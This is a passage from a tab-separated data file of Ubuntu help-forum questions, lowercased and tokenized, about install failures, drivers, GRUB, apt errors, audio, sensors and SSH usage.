197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 564 , in use_cd attributeerror : 'nonetype ' object has no attribute 'get_info' please help .
224085	delete data on mednafen	could you tell me to delete data on mednafen ? uninstalling just only leave the data . not to delete the data , just delete installation . i have a harmful command configuration . that 's make me stuck ! and ca n't do anything .
224089	how can i disable my touchscreen ? ( dell inspiron one 23 )	although i do n't use the touchscreen in ubuntu , because it is a capacitive display i sometimes accidentally touch the display area which causes any text in dialogue windows to automatically highlight when i hover my cursor over the text in dialogue boxes , and in nautilus i ca n't open any folders . the problem results in me having to log out and log back in . is there a way i can disable the touchscreen ? thanks !
224094	install problem on uefi , windows 8 new desktop	i just bought an hp desktop , p6-2326s , which has windows 8 installed . i have tried booting a ubuntu live disc but the machine wo n't boot it . when i bring up the uefi boot menu it offers a selection of uefi boot sources , windows boot manager , dvd drive , ip4 ethernet controller , or ip6 ethernet controller . if i select the dvd drive with the cd in it i get the message '' secure boot violation , invalid structure detected . check secure boot policy in setup . '' with all other selections it just boots into windows . so where do i go from here ?
224106	can not connect to wireless network	i am quite new to using ubuntu 12.10 . all i remember while installing ubuntu 12.10 was that i did n't check any box specifically to enable wireless connectivity . i tried looking into the various questions posted here - most of them refer to certain commands ( redundantly sudo ) and things of that sort . i am quite new and was n't sure of understanding what those commands were trying to do ( the network configuration settings - showed up different options , like 'wireless ' , 'wired ' , 'ipv4 ' , 'ipv6 ' etc -- i am not sure of what sort of settings are to be made - like for example what sort of 'wep ' settings etc are to be made . although i was n't able to connect to the wireless network , i was able to connect to the internet , once i plugged in the ethernet cable . can someone help me with : understanding a way to see if ubuntu is configured to connect to a wireless network . if so - getting to configure to a wireless network ( setting up a new one ) . where in ubuntu , should i look for seeing if there are any hardware devices ( such as the broadcom wireless adapter or things of that sort - like the way we use the 'device manager ' in windows to look into the adapter settings ) . reference material to learn and understand the various ubuntu commands . ( things like the lshw etc ) .
224108	just installed 12.10 with wubi and get error	when i boot wubi it goes to the terminal screen and says : [ drm : drm_crtc_helper_set_config ] *error* failed to set mode on 'crtc:10 ] from what i gather , this is an issue with my monitor . not sure . i am really new to this . i have a compaq presario running xp sp3 and am using a sony bravia 32 '' lcd tv as a monitor . used wubi to install . i suppose it created its own partition because install never asked . is there a work-around for this ? i have tried everything i know of , given my very limited experience .
224110	ubuntu wo n't install from live cd	complete noob here . i am trying to install ubuntu 12.04 from a live cd . i told the computer to boot from the cd ( it does ) & it reads the cd & then quits with the ubuntu dots just freezing . i checked the disk & did the memory test , both ok . i also did the nomodeset in the start-up line . hit escape when it froze but there were no msgs . have also tried ubuntu 12.10 & dream studio , same thing . connected the other disks ( wd raptor , maxtor 250 gb ) , no change . the reason i did that was because now my computer looks for drives , ca n't find any & quits . now it finds drives but still does n't work . it has an intel ssd , which i intend to be c : i do n't know if you have to format ssds or not but i do n't think so . i have a samsung 830 on this computer w windows & i did n't have to format it . i also tried installing with a ubuntu studio dvd which i burned @ single speed , as i had seen some warnings about disks burned faster but still no-go . this machine ran fine when it had windows & i ca n't for the life of me figure out why it wo n't do ubuntu . anyone have any ideas ? asus p5e3 , 3 ghz chip , 4 gb ram , evga force 8800 gtx video , intel ssd . tried some other stuff today . connected the other disks ( wd raptor , maxtor 250 gb ) , no change . the reason i did that was because now my computer looks for drives , ca n't find any & quits . now it finds drives but still does n't work . it has an intel ssd , which i intend to be c : i do n't know if you have to format ssds or not but i do n't think so . i have a samsung 830 on this computer w windoze & i did n't have to format it . i also tried installing with a ubuntu studio dvd which i burned @ single speed , as i had seen some warnings about disks burned faster but still no-go . this machine ran fine when it had windoze & i ca n't for the life of me figure out why it wo n't do ubuntu . can somebody help me out here ? ? ? erik the pope
224115	can not use ffmepg on clipgrab ubuntu 12.10	i have clipbgrab on my ubuntu 12.10 , but when i download on mp3 mode it doesnt convert the video on mp3 file . do you know how can i upgrade to a new version to use it ?
224116	trendnet tew-424ub wireless not working after update 12.10	i updated packages from the software manager and now my wireless wo n't work . it 's a trendnet tew-424ub iwconfig says lo no wireless extensions . eth0 no wireless extensions . sudo lshw -c network : description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 02 serial : 1c:6f:65:46 : e9 : d4 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.1.137 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport : de00 ( size=256 ) memory : fdaff000-fdafffff memory : fdae0000-fdaeffff memory : fda00000-fda0ffff lsusb : bus 003 device 002 : id 0bc2:3332 seagate rss llc expansion bus 003 device 003 : id 05e3:0605 genesys logic , inc. usb 2.0 hub [ ednet ] bus 003 device 006 : id 0457:0163 silicon integrated systems corp. 802.11 wireless lan adapter bus 005 device 002 : id 046d : c00c logitech , inc. optical wheel mouse bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 009 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 005 : id 0781:5530 sandisk corp. cruzer bus 010 device 001 : id 1d6b:0001 linux foundation 1.1 root hub help ? i 'm not sure where to start . i 've been browsing forums and such for a long time and nothing i try is working .
224117	file sync only downloading some files in folder	i 'm synchronizing from a windows machine to an ubuntu 12.04 machine . when i check the files on the website i can see all files uploaded from the windows machine . the problem i 'm having is that although the cloud and the windows machine match in terms of files , my ubuntu machine has n't downloaded all the files . i 'm getting no errors and my ubuntu one client shows that the file sync is up-to-date . i can go to my dashboard and download the file manually so there is no problem with the sync to the cloud , just from the cloud to my local machine . does anyone have a clue as to why i might be seeing this behaviour ?
224118	bug for the updates	i got a serious problem with my updates . they do n't work anymore . error message : w : duplicate sources.list entry http : /archive.ubuntu.com/ubuntu/ precise/main i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages ) , w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ precise/universe i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-i386_packages ) , w : duplicate sources.list entry http : /archive.ubuntu.com/ubuntu/ precise/multiverse i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_multiverse_binary-i386_packages ) , e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . can you help me to fix this ?
224119	minecraft runs really weird in ubuntu 12.10	when i have vsync on my framerate is capped to 30 instead of 60 . also , when i go fullscreen the mouse seems to have really fast acceleration and the game looks really jumpy . i could run this on windows fine . amd athlon ii x2 250 3.0ghz 8 gb ram amd radeon hd 7750 gddr5 1gb . do i need to install some other graphics driver ?
224121	questions on first install	i 've just installed ubuntu 12.10 64bit on dual boot with windows 7 . i 've been looking for a lot of the things people say to download , like myunity but when i search in the software center , nothing comes up , just stuff like magazines . do i need to add some ppas for it to see them ? what are some that i should add on a new install ? and can anyone help me get myunity on here so i can start customising my desktop ? thanks
224125	does the ubuntu image i just downloaded already have all the latest patches and bug fixes included ?	i downloaded 12.10 a day after it was released . it is a little buggy in my system - shows the errors such as a problem has occurred frequently . the developers probably have fixed most of the issues by now . so i was wondering if i was to download a fresh copy of the distribution from ubuntu.com , will the distribution have all the bug patches and updates integrated ? or will i have to run update again to install the patches separately ?
224129	is there an alternative to vs 2012 ?	hey i 'm not sure if this is the right place to ask and sorry if its not , but i 'm needing an alternative to visual studio 2012 for linux and i found 2 so far called netbean and eclipse , out of those or any other ones you guys may know of which is the closest or similar to vs 2012 ? thank you for your time guys .
224134	ubuntu 12.10 - vmware 3d support	i am running ubuntu 12.10 ( host ) , and i am running window 7 in vmware player ( guest ) . when i run vmware it says 3d acceleration is not supported from host but when i check my settings in terminal it says 3d acceleration supported = yes . so my question is does that mean 3d acceleration is already activated or is it just supported ? and how would i get it to work within vmware so i can play games .
224138	install errors with ubuntu one on xp sp3 machine	i have tried to load ubuntu one on an xp machine twice . each time it throws an error : the application or dll `` c : \windows\system32\security.dll is not a valid windows image . please check this against you installation diskette . '' it is referencing ubuntuone-syncdaemon.exe , ubuntuone-control-panel-qt.exe and ubuntuone-proxy-tunnel.exe .
224142	grub error after installing 12.10 side by side with windows 7	i 'm having some big issues right now . i installed ubuntu 12.10 with the windows installer along side windows 7 . now i 'm getting the error : no such partition grub rescue > message . i need help , because i ca n't do anything . a few things : i was never prompted for a partition to create ; it said it had enough room on my c : \ but i cant find it now . i have 12.10 on a bootable usb right now . when i do not have it plugged in , the ls command gives me ( hd0 ) ( hd0,3 ) ( hd0,2 ) ( hd0,1 ) . however , when i plug it in , the ls command also gives me ( hd1 ) and ( hd1,1 ) , but i still cant ls these filesystems and get anything ; they still come up as unknown .
224146	find changes in directory script	i am trying write a script to find all changes ( modify , create , delete ) in a list of directories for last 24h , as the following : # ! /bin/bash logdir=change_log filetype=*.php dir=www output= $ logdir/ $ ( date + % y- % m- % d ) .log function start_check { for i in `find . -name $ dir -type d` ; do used=0 for j in `find $ i -name `` $ { filetype } '' ` ; do case `find $ j -mtime -1` in '' ) ; ; * ) if [ `` $ used '' = `` 0 '' ] ; then current_directory=`echo $ i | cut -d'/ ' -f2` display `` $ current_directory '' fi echo $ j > > $ output used=1 ; ; esac done done } function display { echo `` -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - '' > > $ output ; echo `` $ @ '' > > $ output ; echo `` -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - '' > > $ output ; } main ( ) { echo `` start checking '' > $ output start_check ; } main problem is , when i run the script in ubuntu , i ca n't find any problem , but when i run the script in centos , it ca n't find any changes , the result is null . any idea ?
224151	`` jack server could not be started '' when using qjackctl	i have a problem when i try to connect my guitar to my computer , via line input . audacity works well , and i can record what i play on my guitar ( selecting from preferences from where to record to default : line0 ) . but the problem is in qjackctl : at first when i click on start it shows this error : after that when i click on cancel it gives this error : this is the log from the messages window : 10:30:37.368 patchbay deactivated . 10:30:37.416 statistics reset . 10:30:37.459 alsa connection change . 10:30:37.497 d-bus : service is available ( org.jackaudio.service aka jackdbus ) . can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started 10:30:37.512 alsa connection graph change . 10:30:44.060 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started sat dec 1 10:30:43 2012 : starting jack server ... sat dec 1 10:30:43 2012 : jack server starting in realtime mode with priority 10 sat dec 1 10:30:44 2012 : control device hw:0 sat dec 1 10:30:44 2012 : control device hw:0 sat dec 1 10:30:44 2012 : [ 1m [ 31merror : failed to acquire device name : audio0 error : method `` requestrelease '' with signature `` i '' on interface `` org.freedesktop.reservedevice1 '' does n't exist [ 0m sat dec 1 10:30:44 2012 : [ 1m [ 31merror : audio device hw:0 can not be acquired ... [ 0m sat dec 1 10:30:44 2012 : [ 1m [ 31merror : can not initialize driver [ 0m sat dec 1 10:30:44 2012 : [ 1m [ 31merror : jackserver : :open failed with -1 [ 0m sat dec 1 10:30:44 2012 : [ 1m [ 31merror : failed to open server [ 0m sat dec 1 10:30:45 2012 : saving settings to `` /home/gevorg/.config/jack/conf.xml '' ... 10:31:11.438 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started now i ca n't understand what my problem is .
224153	ubuntu shows disk volumes as one partition	when i was installing ubuntu ( 12.04 and 11.10 ) showed 2 partitions , whereas i have 4 partitions on windows 7 : c ( 70gb ) , d ( 300gb ) , e ( 300gb ) , f ( 30gb ) . ubuntu is only 2 disks : one is 70gb , the latter is 677gb . but inside that disk there are no files from e and f. but when i checked in windows , that files are exist . this is what i got from blkid : /dev/sda2 : uuid= '' deac59a9-a0d0-4a69-a918-d511a9857204 '' type= '' ext4 '' /dev/sda4 : uuid= '' c606c83106c82471 '' type= '' ntfs '' /dev/sda5 : uuid= '' 2d3d4bf9-33b7-461c-aa88-c08caa6bef58 '' type= '' swap '' and this is from sudo fdisk -l how can i access that disks ?
224154	help with error : ‘struct sockaddr_storage’ has no member named ‘s_addr’	i just installed ubuntu 12.10 on my new machine , and i 'm trying to install ushare from the source from the website . i would just install it through the terminal using 'sudo apt-get install ushare ' but i am tweaking the mime.c file so that it 'll stream mp4 files as video . now , i had written a neat little script that did it all nice and neat for me on my ubuntu 12.04 machine , but now when i run the 'make ' command , it is giving me the message : '' error : ‘struct sockaddr_storage’ has no member named ‘s_addr’ '' i appreciate any help !
224156	cant get lm-sensors to load ati radeon temp and fan or output all settings	new to linux and having minor issues : / . i followed this guide initially but did not recieve the proper output and did not show my ati radeon hd 5000 temp or fan speed . then used this guide , same problems exhibited . no issues installing and no errors . i think its not reading i2c for some reason . the proprietary driver is installed and functioning correctly according fglrxinfo . i can use aticonfig commands and view both temp and fan . after scouring the interwebs for two weeks i am still left with no solutions that i have found or how to properly get it working . any ideas on how to get the ati radeon sensors working under 'sensors ' ? when i run 'sudo sensors-detect ' this is my ouput # sensors-detect revision 5984 ( 2011-07-10 21:22:53 +0200 ) # system : lenovo ideapad y560 ( laptop ) # board : lenovo kl3 this program will help you determine which kernel modules you need to load to use lm_sensors most effectively . it is generally safe and recommended to accept the default answers to all questions , unless you know what you 're doing . some south bridges , cpus or memory controllers contain embedded sensors . do you want to scan for them ? this is totally safe . ( yes/no ) : y silicon integrated systems sis5595 ... no via vt82c686 integrated sensors ... no via vt8231 integrated sensors ... no amd k8 thermal sensors ... no amd family 10h thermal sensors ... no amd family 11h thermal sensors ... no amd family 12h and 14h thermal sensors ... no amd family 15h thermal sensors ... no amd family 15h power sensors ... no intel digital thermal sensor ... success ! ( driver `coretemp ' ) intel amb fb-dimm thermal sensor ... no via c7 thermal sensor ... no via nano thermal sensor ... no some super i/o chips contain embedded sensors . we have to write to standard i/o ports to probe them . this is usually safe . do you want to scan for super i/o sensors ? ( yes/no ) : y probing for super-i/o at 0x2e/0x2f trying family `national semiconductor/ite ' ... yes found unknown chip with id 0x8502 probing for super-i/o at 0x4e/0x4f trying family `national semiconductor/ite ' ... no trying family `smsc ' ... no trying family `via/winbond/nuvoton/fintek ' ... no trying family `ite ' ... no some hardware monitoring chips are accessible through the isa i/o ports . we have to write to arbitrary i/o ports to probe them . this is usually safe though . yes , you do have isa i/o ports even if you do not have any isa slots ! do you want to scan the isa i/o ports ? ( yes/no ) : y probing for `national semiconductor lm78 ' at 0x290 ... no probing for `national semiconductor lm79 ' at 0x290 ... no probing for `winbond w83781d ' at 0x290 ... no probing for `winbond w83782d ' at 0x290 ... no lastly , we can probe the i2c/smbus adapters for connected hardware monitoring devices . this is the most risky part , and while it works reasonably well on most systems , it has been reported to cause trouble on some systems . do you want to probe the i2c/smbus adapters now ? ( yes/no ) : y using driver `i2c-i801 ' for device 0000:00:1f.3 : intel 3400/5 series ( pch ) now follows a summary of the probes i have just done . just press enter to continue : driver `coretemp ' : * chip `intel digital thermal sensor ' ( confidence : 9 ) to load everything that is needed , add this to /etc/modules : # -- -- cut here -- -- # chip drivers coretemp # -- -- cut here -- -- if you have some drivers built into your kernel , the list above will contain too many modules . skip the appropriate ones ! do you want to add these lines automatically to /etc/modules ? ( yes/no ) my output for 'sensors ' is : acpitz-virtual-0 adapter : virtual device temp1 : +58.0°c ( crit = +100.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +56.0°c ( high = +84.0°c , crit = +100.0°c ) core 1 : +57.0°c ( high = +84.0°c , crit = +100.0°c ) core 2 : +58.0°c ( high = +84.0°c , crit = +100.0°c ) core 3 : +57.0°c ( high = +84.0°c , crit = +100.0°c ) and my '/etc/modules ' is : # /etc/modules : kernel modules to load at boot time . # # this file contains the names of kernel modules that should be loaded # at boot time , one per line . lines beginning with `` # '' are ignored . lp rtc # generated by sensors-detect on fri nov 30 23:24:31 2012 # chip drivers coretemp update : i am still experiencing this issue . i have done a fresh os install , as well as trying all of the possible ways of installing fglrx through the unofficial wiki . any ideas of help is more than appreciated .
224165	ca n't change boot priority to usb	i 'm new to linux and have just downloaded the usb version of ubuntu 12.04 . when i go into boot priority , the usb drive is not one of the options . i 've read other posts and do n't understand grub and wubi although i see them in the directory on my usb drive . can someone tell me what i 'm doing wrong ? thanks so much for your help !
224169	how to change folder permissions to read , write and execute	i installed xampp , but i 'm not able to create or save files in htdocs folder . this is what i get to see when i try to save a file . the document could not be saved , as it was not possible to write to /opt/lampp/htdocs/myfirstfile.php . check that you have write access to this file or that enough disk space is available .
224173	where 's the best place to begin to master ubuntu	i just want to know where to learn all the commands and all the internet tools and protocols and whatever . please do n't tell me man because that 's written for robots .
224181	how do i include a password with ssh command ? ( want to make shell script )	i 'm trying to ssh to a server on startup with a .sh script , but that will require me to enter the password for the account on the server that i 'm sshing to . i did some rtfming , and i see in `` -o '' that it has `` passwordauthentication '' but i 'm not sure how or if i could use that option . as this will be in a shell script , obviously i 'd like to have the password in that file , or in any case not have to enter in the password manually every time the script runs .
224182	does huawei e220 modem work on ubuntu 12.10 ?	in order to make the above dongle work on my current version of ubuntu 11.10 , i have to run sudo usb_modeswitch -v 0x12d1 -p 1003 -v 0x12d1 -p 1003 -r and remove the modem and connect again . have anyone tried the e220 on the new ubuntu 12.10 ? does it work without such problems ?
224186	apt-get and login problem	i had a problem when i try to update my ubuntu `` 12.04lts '' : accidentally i turn off my computer , while the update was running . when i turn it on and try to complete the update , he always told me , that itâ´s a problem with the `` apt-get '' . i just decide not to install it and then i couldnâ´t start my ubuntu any more , i always come in a point at the beginning like a terminal , where i have to give my username , but i forgot it . any suggestions ? ! thanx ! .j : )
224190	how can i make ssh-copy-id use a port other than 22 ?	how can i make ssh-copy-id use a port other than 22 ? i tried it with -p but i get : ssh-copy-id -p xxx xxxx @ xx.xx.xx.xx bad port 'umask 077 ; test -d ~/.ssh || mkdir ~/.ssh ; cat > > ~/.ssh/authorized_keys' i know that the port is good because i 'm connected to the server on that port .
224191	driver for lexmark prospect pro in ubuntu 12.04	i can not get my lexmark prospect pro 205 to work after upgrading to 12.04 . in fact the printer looks like he is installed , but does nothing when asked to print . i tried already everything , reinstalliing , cups etc , but did not change anything . can anyone help ? i need this printer to work , are quite desperate now ! thanks . rob .
224192	12.10 login-screen loop error accessing ecryptfs home drive	i 'm running 12.10 64 bit on a dell e5410 latitude . everything was working nicely until i tried to install avast antivirus program . this froze my system and i proceeded to remove -- purge the program . now i 'm in the situation that at the login screen i can no longer use my standard ( admin ) user accounts through the graphical interface . when i enter my password the screen goes black flashes code for a milisecond and then returns to the unity login screen . using an alternative terminal ( i.e . alt+f3 ) i can login normally . using my guest account i can also login to graphics mode without an issue . i 've tried unity -- reset , the out put is shown as `` the reset option is now deprecated '' i 'm hesitant to start messing with ccsm for the moment as it sounds like i could potentially do more harm then good . the '.xsession-errors ' ( which i can only access from the guest account ) does not make me any wiser . neither does the '/var/log/xorg.0.log ' provide any obvious clue . i have no idea if i 'm even on the right track and feel that my google and forum searches are no longer giving me more clarity . hoping some one can help with this . all the best from malawi , daniel
224196	dlna on ubuntu 1204 with gnome-classic icons in tray	i am trying different dlna systems to share media in my laptop wirelessly to a samsung smart tv . the ones i 've tried so far , serviio and tvmobili , seem to run as a deamon but do n't show an icon in the tray . this might be due to me having gnome-classic instead of unity . any suggestions for a dnla system that will work for me ?
224200	how to display text beside icons in nautilus 3.6.3 ?	i always used compact view in nautilus because i hate big icons and the list view does n't let you extract archives conveniently by dragging and dropping files onto the free space ( because there 's no free space ! ) and it generally looks slower when scrolling . now they have removed the compact mode in new nautilus : https : //bugzilla.gnome.org/show_bug.cgi ? id=676842 http : //git.gnome.org/browse/nautilus/commit/ ? id=241e462024070d9f79f4816256fc00ff5119e25f and that guy says : there is really little difference between compact mode and icon mode with labels on the side . well , except for that that horrible horizontal scrolling . so the question is then : how do i make icon labels on the side ?
224202	no sound , ubuntu 12.10	i checked the basic sound settings . i had installed the latest version of chrome for linux , despite being warned not to , and now my sound does n't work . everything worked fine for several weeks , including sound for flashplayer , which is why i installed chrome . i tried to uninstall chrome using the ubuntu software center , thinking i would start over , but chrome does n't appear as installed software . i disabled automute using alsamixer and rebooted . i downloaded the latest drivers and rebooted , and still no sound . how do i get back to ubuntu 12.10 , nothing extra to start over ?
224203	wireless lan driver for toshiba satellite c850-a823 pskccv-02300xar	i have toshiba satellite c850-a823 pskccv-02300xar laptop , i had installed ubuntu 12.10 as dual boot ( windows 7 already working ) , after the installation i had noticed that wireless driver not installed in ubuntu 12.10 , from windows device manager i got details of wireless lan driver as follows '' realtek rtl8723ae wireless lan 802.11n pci-e nic '' i dont have lan cable connection , kindly help me how to get wireless driver and install in ubuntu 12.10 hoping for your kind support shiyas
224210	how to upgrade from 11.10 to 12.10 ?	i want to update the ubuntu on my laptop to 12.10 from the current version 11.10 , when i click on the update manager i get a partial update gui , if i click cancel on that i get the gui for update which has three buttons check , install updates and upgrade . the upgrade button upgrades only to 12.04.1.lts , when i press check it checks and gives me this error : '' w : failed to fetch h t t p : //lb.archive.ubuntu.com/ubuntu/dists/precise/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/lb.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_index , w : failed to fetch h t t p : //lb.archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/index no hash entry in release file /var/lib/apt/lists/partial/lb.archive.ubuntu.com_ubuntu_dists_precise_multiverse_i18n_index , w : failed to fetch http : //lb.archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/index no hash entry in release file /var/lib/apt/lists/partial/lb.archive.ubuntu.com_ubuntu_dists_precise_restricted_i18n_index , w : failed to fetch http : //lb.archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/index no hash entry in release file /var/lib/apt/lists/partial/lb.archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_index , e : some index files failed to download . they have been ignored , or old ones used instead . ''
224212	adding pls to rhythmbox	i try to add .pls radio station to rhythmbox . i download the file and i click music > import file but nothing happen . i added one station before and it works fine but now it simply does not work . also when i try to get from the file , click on open with rhythmbox i have the error : could n't start playback problem occurred without error being set . this is a bug in rhythmbox or gstreamer . i have all medibuntu installed and i have one radio station already playing . i do n't know how to proceed from now and what should i check if there is something to fix . anyone get similar problem ? ( ubuntu 12.04 64-bit gnome3 )
224214	my modem can not connect in ubuntu 12.10	need help in connecting modem in ubuntu 12.10 ! how to connect vodafone usb stick modem in ubuntu 12.10 . in ubuntu 11.10 it works , then i try in the same way in ubuntu 12.10 but it doesnt work . do you have a solution ? i am from indonesia , i use sim card 3 as my provider .
224215	how to fix console keymap of installed system from livecd ?	i have by mistake removed important graphical desktop packages . due to some bug or error i can not switch to latin letters , so can not login , because can not write user name ( and password ) , if i go to recovery root , also same situation , i can not write any command . ( if i try alt+shift , and several other shortcuts , they do not work ) . i would fix the installed system , it is ubuntu 12.04 , with live usb flash drive of ubuntu 12.04. how to do it ? ( incorrect console keymap was before deleting desktop , and then i managed to get us keymap temporarily , before next reboot , with `` sudo dpkg-reconfigure console-data '' ) . i think i need to fix it with live usb flash drive . but may be just a correct shortcut to change keymap is enough ...
224219	unable to run completely sudo apt-get update	sudo apt-get update ign http : packages.mate-desktop.org/repo/ubuntu inrelease ... ... err http : packages.mate-desktop.org/repo/ubuntu/quantal sources 503 service unavailable ... ... ... ... ... ... .. ign http : //packages.mate-desktop.org quantal/main translation-en 100 % [ logging in ] this will run for a very long time and wo n't stop .
224220	videoplayback with gl	i have an issue with playing video with video output gl or glx . i have an ati hd 5850 with tear free desktop and the playback works great but the problem is when i move the mouse and the menu of the videoplayer shows ( vlc , smplayer ... ) it seems that for a moment the video freezes and then continues normally . in summary , my problem is in full screen mode , when the bottom menu shows off , the video does something strange.other than that it works great . and if i do n't use gl the performance it 's not the same ...
224221	peerblock equivalent for ubuntu	is there a package available in the package manager that provide features similar that peer block ? if yes , which one is the best ? ( please , one product by answer )
224224	how do i store result of a command in textfile ?	how do i save result of a command in a textfile ? eg , storing result of dpkg -- get-selctions in a file named packages.txt
224231	how do i add dbp to gimp ?	i have kubuntu 12.04.01 with gimp 2.06 . on a previous installation i used dbp . i found it worked well on resizing images , and want to re-install it . although i managed before , i can not now remember how , though there must have been an easy way to do it ! can anyone help , please ?
224232	my dvd installer has been loading for 20 mins	i have downloaded your dvd image . i have burnt it on a regular dvd . but it has been loading for 20 minutes already . i 've installed ubuntu on 5 computers at least , and this is the first time i face this problem . the probable cause of this problem is that i was using windows 8 to burn the image . if that 's the problem , i'il just burn the image again at low speed using cdburner xp . thanks , shaun .
224233	synchronize ubuntu online accounts and gnome online accounts	currently there are two tools for managing online accounts available in ubuntu , the ubuntu online accounts and the gnome online accounts . there are also two kinds of software using either of these two systems , most noticeable in case of empathy . it can access google talk accounts though the ubuntu system but also integrates with gnome-contacts . it in return use gnome online accounts to access the same google accounts for contact data . since the point of these systems is to only manage your accounts in one place it is rather unwelcome to maintain accounts in both . is there a way to synchronize or otherwise replace either system ?
224236	how do i get a cisco precision hd web cam working ?	i have a cisco precisionhd cam that works fine on windows 7 but in ubuntu 12.04 nothing happens when i connect it via usb , i mean it is suppose to show under the devices section , right ? neither skype displays anything under the video settings section ? ( no device found ) .
224237	how to check how long a video ( mp4 ) is using the shell ?	i need to ftp upload all the mp4 files in a directory with length > 4 minutes using the shell . i ca n't find any script to check how long a video is . does anybody have any idea how to do that ? thank you very much !
224239	how to acces ubuntu files ( pictures ) from windows 7	my ubuntu is not running , and i ca n't figure out why or how to fix the problem . it simply wo n't boot . although , i can run the windows 7 so i 'm wondering how to access my ubuntu files by using windows .
224241	broken ubuntu 12.10	i had the ubuntu 12.10 up and running . but somehow i managed to mess it all up . now , i do not get the login screen . it keeps on getting a black screen and cursor blink at something `` jupiter healthcheck `` . pressing random keys , i could get to the terminal . i tried this : sudo apt-get install ubuntu-desktop output was : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntu-desktop : depends : nautilus but it is not going to be installed depends : nautilus-sendto but it is not going to be installed recommends : brasero but it is not going to be installed recommends : nautilus-share but it is not going to be installed recommends : transmission-gtk but it is not going to be installed e : unable to correct problems , you have held broken packages . how do i get go ahead ?
224247	why ca n't i connect to my network via wired dhcp connection ?	i am trying to connect to the lan of the university where i work , on a wired connection . the internet is accessed by vpn after connecting to the network . on windows 7 , the computer seems to automatically connect to the network via dhcp after i plug in an ethernet cable , and lists the relevant vpn so i can enter my username and password . on ubuntu 12.10 , the vpn is not yet even an issue since networkmanager can not even finish the dhcp transaction to connect to the lan first . sudo lspci -v : 00:19.0 ethernet controller : intel corporation 82567lm gigabit network connection ( rev 03 ) subsystem : lenovo device 20ee flags : bus master , fast devsel , latency 0 , irq 45 memory at fc600000 ( 32-bit , non-prefetchable ) [ size=128k ] memory at fc625000 ( 32-bit , non-prefetchable ) [ size=4k ] i/o ports at 1840 [ size=32 ] capabilities : [ c8 ] power management version 2 capabilities : [ d0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ e0 ] pci advanced features kernel driver in use : e1000e kernel modules : e1000e ifconfig -a : eth0 link encap : ethernet hwaddr 00:1c:25:98:6e:8a inet6 addr : fe80 : :21c:25ff : fe98:6e8a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:162 errors:0 dropped:0 overruns:0 frame:0 tx packets:484 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:10368 ( 10.3 kb ) tx bytes:128521 ( 128.5 kb ) interrupt:20 memory : fc600000-fc620000 relevant syslog information : nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : auto-activating connection 'auto ethernet ' . nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) starting connection 'auto ethernet' nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 ] : ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] nov 29 22:06:37 a-thinkpad-t400 networkmanager [ 812 